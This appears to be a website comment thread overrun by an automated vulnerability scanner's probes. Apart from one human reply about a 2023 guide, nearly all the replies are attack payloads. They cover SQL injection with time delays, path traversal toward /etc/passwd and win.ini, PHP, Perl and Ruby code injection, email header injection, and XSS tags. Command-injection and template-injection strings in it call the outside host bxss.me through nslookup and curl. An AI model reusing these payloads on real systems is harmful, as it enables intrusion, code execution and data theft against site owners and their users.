/././././././././././././././././.
re: kk1337
http://bxss.me/t/fit.txt%3F.jpg
re: kk1337
<!--
re: kk1337
";print(md5(31337));$a="
re: kk1337
|(nslookup hitrboczzlaoudd8d8.bxss.me||perl -e "gethostbyname('hitrboczzlaoudd8d8.bxss.me')")
re: kk1337
file:///etc/passwd
re: kk1337
/etc/shells
re: kk1337
${@print(md5(31337))}
re: kk1337
`(nslookup hitjiniwcesxl8968b.bxss.me||perl -e "gethostbyname('hitjiniwcesxl8968b.bxss.me')")`
re: kk1337
/\../\../\../\../\../\../\../etc/passwd
re: kk1337
c:/windows/win.ini
re: kk1337
${@print(md5(31337))}\
re: kk1337
;(nslookup hitecmxjphxvwd908d.bxss.me||perl -e "gethostbyname('hitecmxjphxvwd908d.bxss.me')")|(nslookup hitecmxjphxvwd908d.bxss.me||perl -e "gethostbyname('hitecmxjphxvwd908d.bxss.me')")&(nslookup hitecmxjphxvwd908d.bxss.me||perl -e "gethostbyname('hitecmxjphxvwd908d.bxss.me')")
re: kk1337
/WEB-INF/web.xml
re: kk1337
bxss.me
re: kk1337
'.print(md5(31337)).'
re: kk1337
C:\WINDOWS\system32\drivers\etc\hosts
re: kk1337
../../../../../../../../../../windows/win.ini%00.jpg
re: kk1337
/../../../../../../../../../../boot.ini
re: kk1337
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: kk1337
..\..\..\..\..\..\..\..\windows\win.ini
re: kk1337
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: kk1337
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: kk1337
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: kk1337
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: kk1337
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: kk1337
WEB-INF/web.xml
re: kk1337
WEB-INF\web.xml
re: kk1337
1
re: kk1337
1
re: kk1337
-1 OR 2+909-909-1=0+0+0+1 --
re: kk1337
-1 OR 3+909-909-1=0+0+0+1 --
re: kk1337
-1 OR 2+90-90-1=0+0+0+1
re: kk1337
-1 OR 3+90-90-1=0+0+0+1
re: kk1337
-1' OR 2+837-837-1=0+0+0+1 --
re: kk1337
-1' OR 3+837-837-1=0+0+0+1 --
re: kk1337
-1' OR 2+205-205-1=0+0+0+1 or 'bnnPS1ht'='
re: kk1337
-1' OR 3+205-205-1=0+0+0+1 or 'bnnPS1ht'='
re: kk1337
-1" OR 2+556-556-1=0+0+0+1 --
re: kk1337
-1" OR 3+556-556-1=0+0+0+1 --
re: kk1337
if(now()=sysdate(),sleep(15),0)
re: kk1337
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
1 waitfor delay '0:0:15' --
re: kk1337
z2C5KgHS'; waitfor delay '0:0:15' --
re: kk1337
-5 OR 670=(SELECT 670 FROM PG_SLEEP(15))--
re: kk1337
-5) OR 805=(SELECT 805 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 990=(SELECT 990 FROM PG_SLEEP(15))--
re: kk1337
kF0HNFAU' OR 706=(SELECT 706 FROM PG_SLEEP(15))--
re: kk1337
sPXRZj9U') OR 860=(SELECT 860 FROM PG_SLEEP(15))--
re: kk1337
Dj42GBnf')) OR 748=(SELECT 748 FROM PG_SLEEP(15))--
re: kk1337
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
1'"
re: kk1337
@@hO1uC
re: kk1337
1BB8ET2HMR0
re: kk1337
response.write(9446926*9956346)
re: kk1337
'+response.write(9446926*9956346)+'
re: kk1337
"+response.write(9446926*9956346)+"
re: kk1337
../../../../../../../../../../../../../../etc/passwd
re: kk1337
<esi:include src="http://bxss.me/rpb.png"/>
re: kk1337
../../../../../../../../../../../../../../windows/win.ini
re: kk1337
${10000464+9999604}
re: kk1337
file:///etc/passwd
re: kk1337
../
re: kk1337
)
re: kk1337
!(()&&!|*|*|
re: kk1337
^(#$!@#$)(()))******
re: kk1337
redirtest.acx
re: kk1337
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: kk1337
'.gethostbyname(lc('hitfc'.'cobpejld4022f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(83).chr(119).chr(76).'
re: kk1337
ctime
sleep
p0
(I30
tp1
Rp2
.
re: kk1337
".gethostbyname(lc("hitfs"."zibdsrmk3de8d.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(68).chr(111).chr(72)."
re: kk1337
echo ufoakk$()\ qyiqvw\nz^xyu||a #' &echo ufoakk$()\ qyiqvw\nz^xyu||a #|" &echo ufoakk$()\ qyiqvw\nz^xyu||a #
re: kk1337
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: kk1337
gethostbyname(lc('hitpw'.'pjeevalk437ed.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(77).chr(117).chr(70)
re: kk1337
&echo wllxni$()\ ilyqqh\nz^xyu||a #' &echo wllxni$()\ ilyqqh\nz^xyu||a #|" &echo wllxni$()\ ilyqqh\nz^xyu||a #
re: kk1337
/etc/shells
re: kk1337
|echo yqdajt$()\ iizfqh\nz^xyu||a #' |echo yqdajt$()\ iizfqh\nz^xyu||a #|" |echo yqdajt$()\ iizfqh\nz^xyu||a #
re: kk1337
../../../../../../../../../../../../../../etc/shells
re: kk1337
expr 9000225776 - 925180
re: kk1337
c:/windows/win.ini
re: kk1337
(nslookup -q=cname hitsmzbnhnmzq1ede3.bxss.me||curl hitsmzbnhnmzq1ede3.bxss.me))
re: kk1337
bxss.me
re: kk1337
$(nslookup -q=cname hitlpgmatuete1a353.bxss.me||curl hitlpgmatuete1a353.bxss.me)
re: kk1337
Http://bxss.me/t/fit.txt
re: kk1337
&nslookup -q=cname hitiuaztaprdhffa05.bxss.me&'\"`0&nslookup -q=cname hitiuaztaprdhffa05.bxss.me&`'
re: kk1337
http://bxss.me/t/fit.txt?.jpg
re: kk1337
&(nslookup -q=cname hitofliyocaji660f7.bxss.me||curl hitofliyocaji660f7.bxss.me)&'\"`0&(nslookup -q=cname hitofliyocaji660f7.bxss.me||curl hitofliyocaji660f7.bxss.me)&`'
re: kk1337
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kk1337
|(nslookup -q=cname hitfdauoxdudq39bd8.bxss.me||curl hitfdauoxdudq39bd8.bxss.me)
re: kk1337
';print(md5(31337));$a='
re: kk1337
`(nslookup -q=cname hitjdaneqdjuqa6299.bxss.me||curl hitjdaneqdjuqa6299.bxss.me)`
re: kk1337
HttP://bxss.me/t/xss.html?%00
re: kk1337
";print(md5(31337));$a="
re: kk1337
;(nslookup -q=cname hitugyhrczlin8eca5.bxss.me||curl hitugyhrczlin8eca5.bxss.me)|(nslookup -q=cname hitugyhrczlin8eca5.bxss.me||curl hitugyhrczlin8eca5.bxss.me)&(nslookup -q=cname hitugyhrczlin8eca5.bxss.me||curl hitugyhrczlin8eca5.bxss.me)
re: kk1337
bxss.me/t/xss.html?%00
re: kk1337
${@print(md5(31337))}
re: kk1337
|(nslookup${IFS}-q${IFS}cname${IFS}hitefjnmunajp62376.bxss.me||curl${IFS}hitefjnmunajp62376.bxss.me)
re: kk1337
${@print(md5(31337))}\
re: kk1337
&(nslookup${IFS}-q${IFS}cname${IFS}hitilsmfinhzf907e4.bxss.me||curl${IFS}hitilsmfinhzf907e4.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitilsmfinhzf907e4.bxss.me||curl${IFS}hitilsmfinhzf907e4.bxss.me)&`'
re: kk1337
'.print(md5(31337)).'
re: kk1337
'"()
re: kk1337
"+"A".concat(70-3).concat(22*4).concat(114).concat(77).concat(100).concat(83)+(require"socket"
Socket.gethostbyname("hitsq"+"wzqcorxq50281.bxss.me.")[3].to_s)+"
re: kk1337
'&&sleep(27*1000)*pwkoqd&&'
re: kk1337
'+'A'.concat(70-3).concat(22*4).concat(102).concat(84).concat(115).concat(80)+(require'socket'
Socket.gethostbyname('hiteo'+'qcevbbof645b6.bxss.me.')[3].to_s)+'
re: kk1337
"&&sleep(27*1000)*gnpszv&&"
re: kk1337
'A'.concat(70-3).concat(22*4).concat(110).concat(65).concat(105).concat(74)+(require'socket'
Socket.gethostbyname('hittn'+'cunletyr6ffed.bxss.me.')[3].to_s)
re: kk1337
'||sleep(27*1000)*bkoacj||'
re: kk1337
"||sleep(27*1000)*ujsuyq||"
re: kk1337
replies
re: kk1337
'"
re: kk1337
replies�
re: kk1337
<!--
re: kk1337
replies/.
re: kk1337
'"()&%<zzz><ScRiPt >yuel(9431)</ScRiPt>
re: kk1337
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitspmevdwabha7c48.bxss.me")}}
re: kk1337
'"()&%<zzz><ScRiPt >yuel(9934)</ScRiPt>
re: kk1337
9178722
re: kk1337
PWZqRPpx
re: kk1337
*1
re: kk1337
*1
re: kk1337
*1
re: kk1337
*1
re: kk1337
-1 OR 5*5=25 --
re: kk1337
-1 OR 5*5=26 --
re: kk1337
-1 OR 5*5=25
re: kk1337
-1 OR 5*5=26
re: kk1337
*if(now()=sysdate(),sleep(15),0)
re: kk1337
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: kk1337
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: kk1337
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kk1337
-1; waitfor delay '0:0:15' --
re: kk1337
-1); waitfor delay '0:0:15' --
re: kk1337
-1 waitfor delay '0:0:15' --
re: kk1337
jDNVSrcI'; waitfor delay '0:0:15' --
re: kk1337
-1 OR 313=(SELECT 313 FROM PG_SLEEP(15))--
re: kk1337
-1) OR 23=(SELECT 23 FROM PG_SLEEP(15))--
re: kk1337
-1)) OR 974=(SELECT 974 FROM PG_SLEEP(15))--
re: kk1337
6BWcRzeu' OR 828=(SELECT 828 FROM PG_SLEEP(15))--
re: kk1337
T3bYjnFe') OR 599=(SELECT 599 FROM PG_SLEEP(15))--
re: kk1337
hz8GdxrB')) OR 546=(SELECT 546 FROM PG_SLEEP(15))--
re: kk1337
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kk1337
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kk1337
'||(select 1 from (select pg_sleep(15))x)||'
re: kk1337
''||(select 1 from (select pg_sleep(15))x)||''
re: kk1337
'"
re: kk1337
@@x8VPw
re: kk1337
(select 198766*667891)
re: kk1337
(select 198766*667891 from DUAL)
@guest as I noted it was published in 2023. If you have a more up-to-date guide please share it.
re: thetokyogourmet
1CmPkBtVIcO
re: thetokyogourmet
response.write(9445419*9509964)
re: thetokyogourmet
'+response.write(9445419*9509964)+'
re: thetokyogourmet
%0abcc:074625.67-22101.67.6ddaa.19990.2@bxss.me
re: thetokyogourmet
"+response.write(9445419*9509964)+"
re: thetokyogourmet
to@example.com>%0d%0abcc:074625.67-22102.67.6ddaa.19990.2@bxss.me
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
${10000320+10000095}
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../../proc/version
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: thetokyogourmet
../../../../../../../../../../etc/passwd%00.jpg
re: thetokyogourmet
'.gethostbyname(lc('hitrl'.'daowoxvt14468.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(79).chr(112).chr(69).'
re: thetokyogourmet
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: thetokyogourmet
)
re: thetokyogourmet
".gethostbyname(lc("hitlc"."jjqkfpbtf0235.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(81).chr(114).chr(74)."
re: thetokyogourmet
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
/etc/passwd
re: thetokyogourmet
echo xcraea$()\ ugiomo\nz^xyu||a #' &echo xcraea$()\ ugiomo\nz^xyu||a #|" &echo xcraea$()\ ugiomo\nz^xyu||a #
re: thetokyogourmet
&echo wuzkdr$()\ ksmdzi\nz^xyu||a #' &echo wuzkdr$()\ ksmdzi\nz^xyu||a #|" &echo wuzkdr$()\ ksmdzi\nz^xyu||a #
re: thetokyogourmet
%2fetc%2fpasswd
re: thetokyogourmet
|echo mxfhby$()\ qziaax\nz^xyu||a #' |echo mxfhby$()\ qziaax\nz^xyu||a #|" |echo mxfhby$()\ qziaax\nz^xyu||a #
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
(nslookup hitoyiodgfbxbe312e.bxss.me||perl -e "gethostbyname('hitoyiodgfbxbe312e.bxss.me')")
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
$(nslookup hitsshmcbyxuc5a666.bxss.me||perl -e "gethostbyname('hitsshmcbyxuc5a666.bxss.me')")
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
&nslookup hitkerkhmdxur46a05.bxss.me&'\"`0&nslookup hitkerkhmdxur46a05.bxss.me&`'
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
&(nslookup hitvslfoiwqjy4932a.bxss.me||perl -e "gethostbyname('hitvslfoiwqjy4932a.bxss.me')")&'\"`0&(nslookup hitvslfoiwqjy4932a.bxss.me||perl -e "gethostbyname('hitvslfoiwqjy4932a.bxss.me')")&`'
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(101).concat(74).concat(103).concat(74)+(require"socket"
Socket.gethostbyname("hitjj"+"mxqcyiyw85fa9.bxss.me.")[3].to_s)+"
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
|(nslookup hitlrlychjwseb7377.bxss.me||perl -e "gethostbyname('hitlrlychjwseb7377.bxss.me')")
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(112).concat(83).concat(117).concat(88)+(require'socket'
Socket.gethostbyname('hitxt'+'efzenbipa494e.bxss.me.')[3].to_s)+'
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
`(nslookup hitwbonofmepbbadb5.bxss.me||perl -e "gethostbyname('hitwbonofmepbbadb5.bxss.me')")`
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
;(nslookup hitienimekccz5b696.bxss.me||perl -e "gethostbyname('hitienimekccz5b696.bxss.me')")|(nslookup hitienimekccz5b696.bxss.me||perl -e "gethostbyname('hitienimekccz5b696.bxss.me')")&(nslookup hitienimekccz5b696.bxss.me||perl -e "gethostbyname('hitienimekccz5b696.bxss.me')")
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
bxss.me
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
'"
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
<!--
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
